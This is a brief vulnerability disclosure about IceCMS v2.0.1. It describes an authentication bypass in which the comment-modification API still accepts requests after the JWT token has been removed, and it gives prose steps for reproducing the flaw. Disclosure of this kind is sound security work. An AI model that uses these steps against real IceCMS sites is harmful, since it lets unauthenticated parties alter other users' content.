IceCMS is a standalone content management system before Spring Boot + Vue. IceCMS v2.0.1 has a logical flaw, in the backend /adplanet/PlanetCommentList page, api:/squareComment/ChangeSquareById/{user id}/{content} is used to modify the content. Under normal circumstances, this API can only be accessed after logging in. Harm: Attackers can modify user information without logging in!

In the background, there is a user content management function under the /adplanet/PlanetCommentList page!

We go to this page and get the data package, find the api:/squareComment/ChangeSquareById/{user id}/{content}, which is used to get the modified user content! A successful modification returns 1

We put this package into the text blurring module, delete its JWT token, and then send the package to change the user content to hello. Successfully returns 1

Return to the browser to refresh the page, and the content is successfully modified to hello